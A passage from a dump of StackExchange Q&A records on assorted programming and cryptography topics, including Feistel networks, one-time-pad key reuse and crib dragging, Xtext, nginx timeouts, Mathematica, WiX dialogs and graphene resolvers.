Feistel network, given the underlying function $f$ is a PRF?\nComment: Ah, OK, I think I'm starting to see the idea of the question now. It asks for the number of rounds as a function of $n$, given that the PRF is theoretically secure. Thanks, I'll remove the other comments.\nAnswer: As you probably saw in the reference linked, there are multiple types of \"basic\" generalized Feistel networks: Type-1, Type-2 and Type-3. 
As far as I can tell all of these were introduced at CRYPTO'89 by Zheng, Matsumoto, and Imai in \"On the Construction of Block Ciphers Provably Secure and Not Relying on Any Unproved Hypotheses\".\nSuppose that your state is split into $k$ blocks, then the above paper does in fact prove \/ claim security for these generalized Feistel constructions (with each and every PRF used in all rounds and all state parts of each round being independent):\n\nFor Type-1, security is proven for $2k-1$ rounds\nFor Type-2, security is proven for $k+1$ rounds\nFor Type-3, security is proven for $k+1$ rounds\n\nThe paper also proves \/ claims that these numbers of rounds are actually minimal.\nFor everbody's reference, here are the three basic types as a fancy graphic: \nimage source\nAs one can somewhat clearly see, the first two types are \"special cases\" of the third where a certain selections of PRF invocations and XORings is dropped. The paper does provide further analysis on the number of rounds to keep security when dropping these with certain patterns\n","meta":{"source":"crypto.stackexchange","title":"Luby-Rackoff theorem for Generalized Feistel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Thinking of new way of building a db page populating data via api calls - are there any issues doing it this way\n\nQuestion: Up to know, for DB driven web sites, I've used php (and CodeIgniter) to populate the data within the page prior to rendering, what I'm thinking about doing now is to develop a javascript (via jquery) page, make it as interactive as possible and then connect to the db through ajax\/json calls - so NO data populated to the screen prior to rendering. \nWHY? sort of an idea that I can, some day, hook the same web page to different data sources - a true separation of page from data - linking only via ajax.\nI think the biggest issue could be performance...are there other things to watch out for? What's the best approach to handling security (stateless\/sessionless)?\nAnswer: Definitely something I've considered doing but you'd probably want to develop some kind of framework (or see if someone already has) if you're going to do this. Brute forcing this kind of thing will lead to a lot of redundant code and unnecessary hair loss. Perhaps a jQuery plugin? I'd be very interested to see what you came up with.\nAnswer: The biggest question is accessibility. What about those people using screenreaders, for which Javascript doesn't work? What about those on mobile phones (non-smartphones), again with very limited or no Javascript functionality? What about those people who have simply disabled JS? Event these days, you simply can't assume that everyone can use JS.\nI like the original idea, but perhaps this would be better done via a simple server-side wrapper, which calls out to your data source but which can be quickly and easily changed to point at a different one.\nComment: I think javascript will be used more - didn't google announce a focus on html 5 and javascript?\n","meta":{"source":"stackoverflow","title":"Thinking of new way of building a db page populating data via api calls - are there any issues doing it this way","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cross-References issues in Xtext\n\nQuestion: I am using Xtext 2.10.0 and seem to have some issues with cross-references. Simplified, my grammar (with org.eclipse.xtext.common.Terminals) is the following:\n<code>Model:\n package=Package\n dtos+=DTO*;\n\nPackage:\n 'package' name=FQN;\n\nFQN:\n ID ('.' 
ID)*;\n\nDTO:\n 'dto' name=ID ('extends' extendedDTO=[DTO|FQN])? '{' '}';\n<\/code>\nIn order to provide a correct qualified name for the DTOs, I implemented an own DefaultDeclarativeQualifiedNameProvider, which assembles a qualified name based on the name of the package and the name of the DTO.\nNow I create a first DTO in a file \"base.dto\":\n<code>package base\n\ndto BaseDTO {}\n<\/code>\nIn a second file \"mydto.dto\" I create a second DTO:\n<code>package mydto\n\ndto MyDTO extends base.BaseDTO {}\n<\/code>\nThe part \"base.BaseDTO\" is even suggested by the autocompletion mechanism. However, Eclipse marks this part as an error and says \"Couldn't resolve reference to DTO 'base.BaseDTO'.\". What do I have to change in order to resolve this reference?\nComment: can you please share your nameprovider impl\nComment: I think this was the right hint. Originally, I used this: \"QualifiedName.create(packageName, dtoName)\". However, the package name consists of several elements. I splittet the package name into segments (at the dot) and put all segments into the QualifiedName. This works. Thank you very much!\nAnswer: Here i my NameProvider Impl\n<code>class MyDslNameProvider extends DefaultDeclarativeQualifiedNameProvider {\n\n def QualifiedName qualifiedName(DTO dto) {\n val model = EcoreUtil2.getContainerOfType(dto, Model)\n val packageName = converter.toQualifiedName(model.package.name)\n val result = packageName.append(dto.name)\n result\n }\n\n}\n<\/code>\nAnswer: The issue was, that my original NameProvider had the following method (where \"qualifiedPackageName\" is an extension method delivering the name of the package):\n<code>def qualifiedName(DTO dto) {\n val packageName = dto.qualifiedPackageName\n val dtoName = dto.name\n\n val qualifiedName = QualifiedName.create(packageName, dtoName)\n\n qualifiedName\n}\n<\/code>\nHowever, the package name is a fully qualified name and it seems that it is necessary to split it into the single segments:\n<code>static val PACKAGE_SEPARATOR = '\\\\.'\n\ndef qualifiedName(DTO dto) {\n val packageName = dto.qualifiedPackageName\n val packageNameSegments = packageName.split(PACKAGE_SEPARATOR)\n val dtoName = dto.name\n\n val segments = packageNameSegments + #[dtoName]\n val qualifiedName = QualifiedName.create(segments)\n\n qualifiedName\n}\n<\/code>\nWith the modified NameProvider, everything seems to work perfect.\n","meta":{"source":"stackoverflow","title":"Cross-References issues in Xtext","dup_signals":{}},"subset":"stackexchange"} +{"text":"Taking advantage of one-time pad key reuse?\n\nQuestion: Suppose Alice wants to send encryptions (under a one-time pad) of $m_1$ and $m_2$ to Bob over a public channel. Alice and Bob have a shared key $k$; however, both messages are the same length as the key $k$. Since Alice is extraordinary lazy (and doesn't know about stream ciphers), she decides to just reuse the key.\nAlice sends ciphertexts $c_1 = m_1 \\oplus k$ and $c_2 = m_2 \\oplus k$ to Bob through a public channel. Unfortunately, Eve intercepts both of these ciphertexts and calculates $c_1 \\oplus c_2 = m_1 \\oplus m_2$.\n\nWhat can Eve do with $m_1 \\oplus m_2$? \n\nIntuitively, it makes sense that Alice and Bob would not want $m_1 \\oplus m_2$ to fall into Eve's hands, but how exactly should Eve continue with her attack?\nComment: Note that this question will also cover key stream reuse as generated by most stream ciphers such as RC4 or a block cipher in a mode of operation that generates a key stream such as AES-CTR. 
(OK, that should take care of the search engines :P )\nComment: Well, what you are doing is using a randomly generated key and combining it with the plaintext to form the ciphertext. If it is used more than once, then you could find out how the key and plaintext are being used to form the ciphertext, then exploit this to deduce some letters? Further, use common cryptanalysis techniques to solve (letter frequency, bigrams, etc...)? This might help: http:\/\/www.cs.utsa.edu\/~wagner\/laws\/pad.html\nAnswer: There is a great graphical representation (which I found on cryptosmith, but they keep changing their url structures, so I've added the graphics in here) of the possible problems that arise from reusing a one-time pad. \nLet's say you have the image\n\nand you encrypt it by using the binary one-time-pad (xor-ing on black and white)\n.\nYou get the following extremely secure encryption\n.\nIf you then encrypt a smiley face with the same one-time-pad,\n\nyou get another secure encryption\n.\nBut if you have both and you xor them together\n\nthen you get the image\n\nwhich, as you can qualitatively and intuitively see is very insecure.\nReusing the same key multiple times is called giving the encryption 'depth' - and it is intuitive that the more depth given, the more likely it is that information about the plaintext is contained within the encrypted text.\nThe process of 'peeling away' layered texts has been studied, as ir01 mentions, and those methods improve with more layers.\nComment: This picture illustrates things beautifully. I guess the spirit of my question was \"how would you actually do the statistical analysis once you have $m_1 \\oplus m_2$\"; a respectable cryptographer would probably say something like \"that's trivial\".\nComment: I can do that final XOR in my head, by crossing my eyes so that one eye is looking at each encrypted message - treating them like a random dot stero pair. It's not quite enough for me to read the text or recognise the smiley face, but it's certainly enough to see that there is some high contrast figure.\nAnswer: Here, since the key is used more than one time, an attack called \"crib dragging\" can be used to attack the cipher-text.\nThe blog post Many Time Pad Attack - Crib Drag could give you a greater understanding on the implementation part:\n\nMany Time Pad Attack \u2013 Crib Drag\n\nThe one time pad (OTP) is a type of stream cipher that is a perfectly secure method of encryption. It's very simple to implement and is perfectly secure as long as the length of the key is greater than or equal to the length of the message. That's its major downfall. However, it also requires that the key never be used more than once. This tutorial shows what happens when you re-use a key to encrypt more than one message. I also show how to uncover the plain-text of two messages that have been encrypted with the same key, without even knowing the key. I use a method called crib dragging.\n\nLet's begin with a brief description of OTP and how it works. Let's take the following message and key:\n\n<code>message = \"Hello World\"\nkey = \"supersecret\"\n<\/code>\n\nIf we convert both the message and key to hex strings, we get the following:\n\n<code>message = \"48656c6c6f20576f726c64\"\nkey = \"7375706572736563726574\"\n<\/code>\n\nIf we do a simple XOR of the two hex strings we get the following cipher-text:\n\n<code>cipher-text = \"3b101c091d53320c000910\"\n<\/code>\n\nIf we XOR the cipher-text with the key, we can recover the plain-text. That's how OTP works. 
Without the key, you have no way of uncovering the plain-text.\n\nLet's consider what happens when you have two messages encrypted with the same key. Take the following two messages and key:\n\n<code>message1 = \"Hello World\"\nmessage2 = \"the program\"\nkey = \"supersecret\"\n<\/code>\n\nIf we convert each message and the key to hex strings, and then encrypt each message using a simple XOR with the key, we'll get the following cipher-texts:\n\n<code>cipher-text1: \"3b101c091d53320c000910\"\ncipher-text2: \"071d154502010a04000419\"\n<\/code>\n\nLet's say that all we have is the two cipher-texts and the knowledge that they were encrypted with a supposed OTP; however, they were both encrypted with the same key. To attack this encryption and uncover the plain-text, follow the steps below.\n\nGuess a word that might appear in one of the messages\nEncode the word from step 1 to a hex string\nXOR the two cipher-text messages\nXOR the hex string from step 2 at each position of the XOR of the two cipher-texts (from step 3)\nWhen the result from step 4 is readable text, we guess the English word and expand our crib search.\nIf the result is not readable text, we try an XOR of the crib word at the next position.\n\nStep 1 seems difficult (guessing a word that might appear in one of the messages), but when you think about it, the word \"the\" is the most commonly used English word. So, we'll start with assuming \"the\" is in one of the messages. After encoding \"the\" as a hex string, we'll get \"746865\". That takes care of steps 1 and 2. If we XOR the two cipher-texts, we'll get the following result:\n\n<code>cipher-text1 XOR cipher-text2 = \"3c0d094c1f523808000d09\"\n<\/code>\n\nThe next step is to XOR our crib word \"746865\" at each position of the XOR of the cipher-texts. What we'll do is slide \"746865\" along each position of \"3c0d094c1f523808000d09\" and analyze the result. After the first XOR, we get the following result:\n\n<code> 3c0d094c1f523808000d09\nXOR 746865\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n 48656c\n<\/code>\n\nWhen we convert the hex string \"48656c\" to ASCII, we get the following text, \"Hel\". This takes us to step 5 from above. Because this looks like readable text, we can assume that the word \"the\" is in the first position of one message. If we didn't get readable text, we would slide 48656c one position to the right and try again (and keep repeating until the end of 3c0d094c1f523808000d09).\n\nNote that we don't know which message contains the word \"the\". It could be in either <code>message1<\/code> or <code>message2<\/code>. Next, we need to guess what the word \"Hel\" is when fully expanded. It could be \"Help\", \"Hello\", etc. If we guess \"Hello\", we can convert \"Hello\" to a hex string, we get \"48656c6c6f\". We then XOR it with the XOR of the two cipher-texts (just like we did with \"the\"). Here's the result:\n\n<code> 3c0d094c1f523808000d09\nXOR 48656c6c6f\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n 7468652070\n<\/code>\n\n\"7468652070\", when converted to ASCII, is \"the p\". We then repeat the process, guessing what \"the p\" might be when expanded and then XOR that result with the XOR of the cipher-texts. 
Granted, guessing what \"the p\" might expand to is not super easy, but you get the idea. If we were to guess \"the program\", convert it to a hex string, and XOR it with the XOR of the cipher-texts, we'll get \"Hello World\".\n\nThis is called crib dragging. My suggestion is to first try \" the \" (note the spaces before and after). Most cipher-texts that you'll try cracking will contain that word somewhere in the text. If the result of your crib drag yields gibberish, then you can be sure \" the \" isn't in either of the plain-text messages. So, try another commonly used English word or phrase and keep trying until the result yields something that looks like readable text. Then you can just expand your guess and keep XORing until you uncover the plain-text messages.\nAnswer: There are two methods, named statistical analysis or Frequency analysis and pattern matching.\nNote that in statistical analysis Eve should compute frequencies for $aLetter \\oplus aLetter$ using some tool like this. A real historical example using frequency analysis is the VENONA project. \nEDIT: Having statistical analysis of $aLetter \\oplus aLetter$ like this says:\nIf a character has distribution $X$, the two characters behind $c_1 \\oplus c_2$ with probability $P$ are $c_1$, $c_2$. \nComment: http:\/\/robert-lerner.com\/live-letter-frequency-analysis.php died\nComment: Since Robert Lerner's tool is not to be found, here is another: https:\/\/www.dcode.fr\/frequency-analysis\nAnswer: A recent (2006) paper that describes a method is \"A natural language approach to automated cryptanalysis of two-time pads\". The abstract:\n\nWhile keystream reuse in stream ciphers and one-time pads has been a\n well known problem for several decades, the risk to real systems has\n been underappreciated. Previous techniques have relied on being able\n to accurately guess words and phrases that appear in one of the\n plaintext messages, making it far easier to claim that \"an attacker\n would never be able to do that.\" In this paper, we show how an adversary\n can automatically recover messages encrypted under the same\n keystream if only the type of each message is known (e.g. an HTML page\n in English). Our method, which is related to HMMs, recovers the most\n probable plaintext of this type by using a statistical language model\n and a dynamic programming algorithm. It produces up to 99% accuracy on\n realistic data and can process ciphertexts at 200ms per byte on a\n $2,000 PC. To further demonstrate the practical effectiveness of the\n method, we show that our tool can recover documents encrypted by\n Microsoft Word 2002\nAnswer: Each zero in $m_1\\oplus m_2$ indicates a matching character. These are known as coincidences. The number of coincidences can possibly indicate what language they are communicating in since different languages have a different character frequency distribution. (Random data should have coincidences 1\/26 of the time if using only lowercase letters, whereas English should be around 6%). \nSee Index of Coincidence for more information about that.\nOther than that, you could XOR common words in various locations against $m_1\\oplus m_2$. If the result makes sense (i.e., isn't a bunch of gibberish unprintable ASCII characters) then you found a possible match for both original plain texts at that location. With enough persistence its very possible you could extract meaningful information. 
You might start with a word like 'the' and go from there, and maybe score the results using an English trigram distribution.\nComment: Actually it's 1\/52 since we have both lower and upper case, and even higher if you consider punctuation and other symbols. It wouldn't make much sense to start with 'the' because it's unlikely the word will align in both messages. On the other hand checking for it is not expensive so you might as well go for it. Looking for 'e' alone is much more likely to yield fruitful results, and then you proceed to find digrams, trigrams etc.\nComment: I specified 'if using only lowercase letters' in the post.\n\nIt's irrelevant if 'the' (actually ' the ' with spaces on each end is a better phrase to start with) matches up in both plain texts, just that it exists in one of the plain texts. If in m1 you have ' the ', then XORing ' the ' in the same position in m1\u2295m2 will reveal the corresponding text in m2.\n\nYou can't do this with individual characters because you have to be able to judge whether the result is random letters like 'xztyb' (thus not a match at that location) or maybe some letters like 'nd th' which would show up relatively often.\nAnswer: The thing here is:\nWhen you just XOR the cyphertexts with each other, what you get is in fact the XOR result of both cleartexts.\n\n$f(a) \\oplus f(b) = a \\oplus b$\n\nAnd after that point, all that's left is to use statistical analysis, as ir01 has mentioned.\nIn fact, the early cell phones used to implement a somewhat similar encryption scheme. They had a one byte (if my memory serves me well) key which was used to XOR the voice in blocks. Thus, an attacker could just XOR the voice message by itself phase shifted by one byte, and get the clear voice communication phase shifted and XOR'd by itself. Which is indeed very easy to crack. Even easier to crack than the XOR result of two separate cleartexts.\nAlso, as Tangurena mentioned, the Soviet message traffic was decrypted due to the fact that one-time-pads had been re-used. See the Wikipedia article on the VENONA Project.\nPlus, here's an article with a little more insight to the practical side of the subject:\nAutomated Cryptanalysis of Plaintext XORs of Waveform Encoded Speech\nAnswer: If you have $m_1 \\oplus m_2$, you can learn about the underlying message format. \nIt is possible to determine patterns in the underlying plaintext and use these patterns to extract data from the ciphertext.\nComment: For example, every zero in the output indicates a matching byte in the two inputs.\n","meta":{"source":"crypto.stackexchange","title":"Taking advantage of one-time pad key reuse?","dup_signals":{}},"subset":"stackexchange"} +{"text":"use an external Json as source with tagit.js\n\nQuestion: I have some problem with the tagit.js script (https:\/\/github.com\/aehlke\/tag-it)\ni know this kind of questions has been asked before : \nModify the behavior of jquery tag-it based on autocomplete library to use ajax JSON sources\nOR \njQuery TagIt (autocomplete) Fetching JSON list via AJAX\nIn my case, i can load tags from an external json, but there is no intelligent autocompletion. 
When i type \"Hello\", the plug in show me the whole tag which are on my Json, with no logical order.\nMy code : \n<code> $(function(){\n\n $('#biginput').tagit({\n\n allowSpaces:true,\n\n autocomplete: {delay: 0, minLength: 0},\n afterTagAdded: function(event, ui) {\n launchsearch();\n console.log(ui.tag);\n },\n afterTagRemoved: function(event, ui) {\n launchsearch();\n console.log(ui.tag);\n },\n\n tagSource: function(search, showChoices) {\n var that = this;\n $.ajax({\n url: \"search.json\",\n data: search,\n success: function(choices) {\n showChoices(that._subtractArray(choices, that.assignedTags()));\n }\n });\n }\n\n });\n\n});\n<\/code>\nI have tried to reproduce my problem in jsfiddle, but it doesn't work... \nLook here : http:\/\/jsfiddle.net\/bsofcn41\/\nMy goal is just to have tag autocompletion with a json file as basis.\nit seems that this script is very badly updated and maintained in github. Maybe there is better script of this kind ?\nAnswer: Try jquery-tokeninput. It uses json as autocomplete data.\n","meta":{"source":"stackoverflow","title":"use an external Json as source with tagit.js","dup_signals":{}},"subset":"stackexchange"} +{"text":"Given a string, return a string\n\nQuestion: So basically I want to return the string, with a message.\nThis is what I have so far, why am I getting undefined for the name back I have a series of test that run, and it's supposed to return a empty strong for the first test.\n<code>export const twoFer = (name) => {\n\n let saying = \"One for\" + name + \",\" + \"One for me\"\n let greeting = saying\n\n if (name === '') {\n let greeting = \"One for you, One for me\"\n } else {\n let greeting = \"One for\" + name + \",One for me\"\n }\n\n return greeting;\n};\n<\/code>\nI thought it would be useful to provide the tests as well so..\n<code>import { twoFer } from '.\/two-fer'\n\ndescribe('twoFer()', () => {\n test('no name given', () => {\n expect(twoFer()).toEqual(\"One for you, one for me.\")\n })\n\n xtest('a name given', () => {\n expect(twoFer(\"Alice\")).toEqual(\"One for Alice, one for me.\")\n })\n\n xtest('another name given', () => {\n expect(twoFer(\"Bob\")).toEqual(\"One for Bob, one for me.\")\n })\n})\n<\/code>\nEDIT Final Solution:\n<code>export const twoFer = (name = null) => {\n if (!name) {\n return \"One for you, one for me.\"\n } else {\n return \"One for \" + name + \",\" + \" one for me.\"\n }\n};\n<\/code>\nComment: I think you should make the string case insensitive.\nAnswer: In your example, <code>name<\/code> is not an empty string, it is <code>undefined<\/code>. 
Instead, try <code>!name<\/code>, which will be truthy for <code>undefined<\/code>, empty string, <code>null<\/code>, etc.\n\n<code>const twoFer = (name=null) => {\n if (!name) {\n return \"One for you, One for me\"\n } else {\n return \"One for \" + name + \", One for me\"\n }\n};\n\nconsole.log(twoFer());\nconsole.log(twoFer(''));\nconsole.log(twoFer('bob'));<\/code>\nComment: I am still receiving back undefined from the test .\nAnswer: Scope issue, consider these two cases:\n\n<code>const twoFer = (name) => {\n\n let saying = \"saying is now greeting \" + name\n let greeting = saying\n\n if (!name) {\n let greeting = \"this wont set greeting, because let is in if()'s scope\"\n } else {\n let greeting = \"this also wont set greeting\"\n }\n\n return greeting;\n};\nconsole.log(twoFer('foo'))<\/code>\n\nremoving <code>let<\/code>\n\n<code>const twoFer = (name) => {\n\n let saying = \"saying is now greeting \" + name\n let greeting = saying\n\n if (name === '') {\n greeting = \"One for you, One for me\"\n } else {\n greeting = \"One for\" + name + \",One for me\"\n }\n\n return greeting;\n};\nconsole.log(twoFer('foo'))<\/code>\n\nIs alot of unnecessary code it can be done with one line:\n<code>const twoFer = name => `One for ${name || 'you'}, One for me`\n<\/code>\n","meta":{"source":"stackoverflow","title":"Given a string, return a string","dup_signals":{}},"subset":"stackexchange"} +{"text":"502 error nginx + ruby on rails application\n\nQuestion: Application details :\nRails 3.1.0\nRuby 1.9.2\nunicorn 4.2.0\nresque 1.20.0\nnginx\/1.0.14\nredis 2.4.8 \nI am using active_admin gem, for all URL's getting response 200,\nbut only one URL giving 502 error on production.\nrake routes :\n<code>admin_links GET \/admin\/links(.:format) {:action=>\"index\", :controller=>\"admin\/links\"}\n<\/code>\nAnd its working on local(development).\nlocalhost log : response code 200\n<code> Started GET \"\/admin\/links\" for 127.0.0.1 at 2013-02-12 11:05:21 +0530\n Processing by Admin::LinksController#index as *\/*\n Parameters: {\"link\"=>{}}\n Geokit is using the domain: localhost\n AdminUser Load (0.2ms) SELECT `admin_users`.* FROM `admin_users` WHERE `admin_users`.`id` = 3 LIMIT 1\n (0.1ms) SELECT 1 FROM `links` LIMIT 1 OFFSET 0\n (0.1ms) SELECT COUNT(*) FROM `links` \n (0.2ms) SELECT COUNT(count_column) FROM (SELECT 1 AS count_column FROM `links` LIMIT 10 OFFSET 0) subquery_for_count \n CACHE (0.0ms) SELECT COUNT(count_column) FROM (SELECT 1 AS count_column FROM `links` LIMIT 10 OFFSET 0) subquery_for_count \n Link Load (0.6ms) SELECT `links`.* FROM `links` ORDER BY `links`.`id` desc LIMIT 10 OFFSET 0\n Link Load (6677.2ms) SELECT `links`.* FROM `links` \n Rendered \/usr\/local\/rvm\/gems\/ruby-1.9.2-head\/gems\/activeadmin-0.4.2\/app\/views\/active_admin\/resource\/index.html.arb (14919.0ms)\n Completed 200 OK in 15663ms (Views: 8835.0ms | ActiveRecord: 6682.8ms | Solr: 0.0ms)\n<\/code>\nproduction log : 502 response \n<code> Started GET \"\/admin\/links\" for 220.127.116.11 at 2013-02-12 05:25:37 +0000\n Processing by Admin::LinksController#index as *\/*\n Parameters: {\"link\"=>{}}\n<\/code>\nNGinx error log\n<code>2013\/02\/12 07:36:16 [error] 32401#0: *1948 upstream prematurely closed connection while reading response header from upstream\n<\/code>\ndon't know what's happening, could some buddy help me out.\nComment: Could you post your `rake routes` and the exact error you are seeing?\nComment: added *log* and `rake routes`\nComment: Unicorn and Nginx config please\nComment: In this case, upstream 
error means that your Unicorn processes are not running properly. Can you paste your unicorn config? Also can you observe the output of top command to see if there is any memory spikes with the application?\nComment: Did you find a solution to this problem?\nComment: @rkp Please help.....\nComment: @rkp: Can you please try solution for this problem http:\/\/stackoverflow.com\/questions\/27797234\/display-has-to-many-association-activeadmin-rails-not-working-in-staging-but-wor\nAnswer: You have a timeout problem.\nTackling it\n\nHTTP\/1.1 502 Bad Gateway\n\nIndicates, that nginx had a problem to talk to its configured upstream.\nhttp:\/\/en.wikipedia.org\/wiki\/List_of_HTTP_status_codes#502\n\n2013\/02\/12 07:36:16 [error] 32401#0: *1948 upstream prematurely closed connection while reading response header from upstream\n\nNginx error log tells you Nginx was actually able to connect to the configured upstream but the process closed the connection before the answer was (fully) received.\nYour development environment:\n\nCompleted 200 OK in 15663ms\n\nApparently you need around 15 seconds to generate the response on your development machine.\n\nIn contrast to proxy_connect_timeout, this timeout will catch a server\n that puts you in it's connection pool but does not respond to you with\n anything beyond that. Be careful though not to set this too low, as\n your proxy server might take a longer time to respond to requests on\n purpose (e.g. when serving you a report page that takes some time to\n compute). You are able though to have a different setting per\n location, which enables you to have a higher proxy_read_timeout for\n the report page's location.\n\nhttp:\/\/wiki.nginx.org\/HttpProxyModule#proxy_read_timeout\nOn the nginx side the proxy_read_timeout is at a default of 60 seconds, so that's safe\nI have no idea how ruby (on rails) works, check the error log - the timeout happens in that part of your stack\nComment: can you please try solution to this problem http:\/\/stackoverflow.com\/questions\/27797234\/display-has-to-many-association-activeadmin-rails-not-working-in-staging-but-wor\n","meta":{"source":"stackoverflow","title":"502 error nginx + ruby on rails application","dup_signals":{}},"subset":"stackexchange"} +{"text":"Buggy Reduce\/Resolve function?\n\nQuestion: It seems to me that this is a clear-cut case of Mathematica actually producing the wrong answer (with no warnings). \nI'm trying to express the fact that for any integer, there exists a factorization (even if that factorization is just n = n * 1). But Mathematica says no. \nIf I replace the domain with Reals or Complexes, then it says True. \nIs this a bug or am I using these functions incorrectly?\n<code>Resolve[ForAll[n, Exists[{p, q}, p*q == n]], Integers]\n\n(*Out[1]= False*)\n\nReduce[ForAll[n, Exists[{p, q}, p*q == n]], {n, p, q}, Integers]\n\n(*Out[2]= False*)\n<\/code>\nComment: `FullSimplify[ForAll[n, Exists[{p, q}, p*q == n]], {n, p, q} \\[Element] Integers]` works nicely, though.\nComment: @J.M. Try `FullSimplify[\n ForAll[n, Exists[{p, q}, p\/Pi q\/Sqrt@2 == n]], {n, p, q} \\[Element] \n Integers]`\nComment: @bel, now that sure is nasty...\nComment: @J.M. I believe the quantifiers are isolating its variables, so they are not visible to FullSimply's assumptions\nComment: It doesn't seem a problem of `FullSimplify`, but rather of `Exists\/ForAll`. E.g. 
`Resolve[ForAll[n, Exists[{p, q}, p*q == n]], {n, p, q} \\[Element] Integers]` returns `True`.\nComment: @belisarius, `Resolve[ForAll[n, n \\[Element] Reals], Primes]` returning `False` doesn't look too different, right?\nComment: @Rojo `Primes` does not work. Try `Resolve[ForAll[n, n \\[Element] Reals], #] & \/@ {Rationals, Integers, Reals, Complexes}` instead\nComment: The same thing happens when I move the Integers constraint to the condition part of the quantifiers, and change the Resolve domain to Reals, as in\n\n`Resolve[ForAll[n, n \\[Element] Integers, \n Exists[p, p \\[Element] Integers, \n Exists[q, q \\[Element] Integers, p*q == n]]], Reals]`\nAnswer: I think it is a limitation of <code>Resolve[]<\/code>.\nAs stated in the help:\n\nResolve[expr] can in principle always eliminate quantifiers if expr contains only polynomial equations and inequalities over the reals or complexes. \n\nIt shouldn't return <code>False<\/code>, though.\nEdit\nI am sure this\n<code>Trace[Resolve[ForAll[n, Exists[{p, q}, p q == n]], Integers], TraceInternal -> True]\n<\/code>\nmust explain what is happening ... but I wrote the relevant notes in the margin of some notebook and I can't find them now :)\n","meta":{"source":"mathematica.stackexchange","title":"Buggy Reduce\/Resolve function?","dup_signals":{}},"subset":"stackexchange"} +{"text":"MSI installer, Wix and dialog size value\n\nQuestion: I've noticed that the articles, tutorials and samples of creating the custom dialogs in Wix always use the same dialog size - Width=\"370\" Height=\"270\"(in the installer units) which corresponds to 494px * 360px for 96DPI. The example is http:\/\/blogs.technet.com\/b\/alexshev\/archive\/2008\/10\/16\/from-msi-to-wix-part-20-user-interface-required-dialog-boxes.aspx\nMoreover, a lot of MSI installers use exactly this size for the dialogs. I wonder where this size value came from? Is there any guideline about the installer dialog size?\nAnswer: These standard values for MSI UI dialogs come from Windows SDK, the <code>uisample.msi<\/code> file.\nThis size is close to the standard wizard Wizard interface, and MSI \"Wizards\" mimic Wizard\u00a0'97 UI. See Wizard '97 sample image, the size of the image is 513 \u00d7 397 px.\nAnswer: If there's anything special about it, it likely hails from a size that looked good on a default Windows 95 or so taskbar configuration with a screen resolution of 640x480 pixels. Realistically you can use other sizes, such as Visual Studio's installation which is much larger.\nComment: I don't think that what you said makes much sense. Visual Studio installer does not use the windows installer UI(see http:\/\/stackoverflow.com\/questions\/3233642\/how-do-you-make-a-really-nice-installer-like-visual-studios), so it can use arbitrary size. But my question IS about windows installer UI.\nComment: Also, I would like to notice that Wix has the built-in dialogs set(http:\/\/wix.sourceforge.net\/manual-wix3\/WixUI_customizations.htm) and they use the mentioned size value as well and it is not customizable.\nComment: I've never customized a WiX UI, so sorry if customizing its size is hard. 
I thought your question was more about size than the underlying technology, hence the comment about Visual Studio's larger UI - it is indeed an external UI, but it is an installer.\n","meta":{"source":"stackoverflow","title":"MSI installer, Wix and dialog size value","dup_signals":{}},"subset":"stackexchange"} +{"text":"Accessing the data of the parent graphene.ObjectType from the nested class\n\nQuestion: As mentioned\nin this question, a nested query in graphene in python can be done. Is there a way to access the data of a parent query?\nWith reference to the same question\n<code>query {\n person (id: \"Mary\") {\n id\n name\n }\n}\n<\/code>\nThe nested query:\n<code>query {\n people {\n group\n allPersons {\n name\n }\n }\n}\n<\/code>\nHow would I access <code>group<\/code> from <code>people<\/code> in the resolver for <code>allPersons<\/code>.\nAnswer: The graphene documentation doesn't make this clear.\nAs the page mentioned in the question the root query is as follows:\n<code>class YourQuery(object):\n # person = ...\n people = graphene.Field(AllPeopleType)\n\n def resolve_people(self, info):\n return AllPeopleType()\n<\/code>\nTo access the variables of the parent of <code>Person<\/code> which triggered <code>resolve_all_persons<\/code>, i.e <code>AllPersons<\/code>\n<code>class AllPeopleType(graphene.ObjectType):\n group = graphene.Int()\n all_persons = graphene.List(Person)\n\n def resolve_all_persons(self, info, **kwargs):\n # This allows us to access group of AllPersons\n personGroup = self['group']\n return Person.objects.all()\n<\/code>\nHowever this will not work if <code>all_persons<\/code> resolver is defined as\n<code>all_persons = graphene.List(Person, resolver = yourResolverFunctionHere)\n<\/code>\nThis is becuase the resolver for <code>Person<\/code> (and anything within <code>AllPersons<\/code>) must be a member of the Parent class <code>AllPersons<\/code> which resolves its own variables.\n","meta":{"source":"stackoverflow","title":"Accessing the data of the parent graphene.ObjectType from the nested class","dup_signals":{}},"subset":"stackexchange"} +{"text":"Editing a php scrip\u00e8t divs to output a table\n\nQuestion: Hey guys ok so i'm wokring on a clients Weekly Newsletter i'm working with Joomla 2.5.19 and using the enterprise version of acymailling to send it out. I'm kicking my heading in at the moment because of outlook, i'm using a module from Jreviews that publishes the latest reviews submitted to the site in the newsletter, it all works fine except in outlook. \nthe out put of the script is meant to be a 2x2table with the 4 latest reviews in it. the only prob is outlook seems to hates me using Div for a table and stacks the 2x2 table into a verticle kaotic mess.\nthe code i'm trying to edit is:\n'>\n<code><?php \/* root element for the items *\/ ?>\n<div class=\"jrModuleItems <?php echo $orientation . ' jrThumbnail'.ucfirst($tn_position); ?>\">\n\n <?php \/* new page starts here *\/\n $pages = array_chunk($reviews,$limit);\n $j=0;\n foreach($pages AS $page):\n ?>\n\n <div class=\"jr-results jrResults jrModuleContainer jrReviewsModule\">\n\n <?php $i=0;\n while(!empty($page)):\n $i++; $j++; $review = array_shift($page); ?>\n\n <?php\n \/\/ Process link title\n $listing_title = ($listing_title_chars && mb_strlen($review['Listing']['title'])>$listing_title_chars) ? 
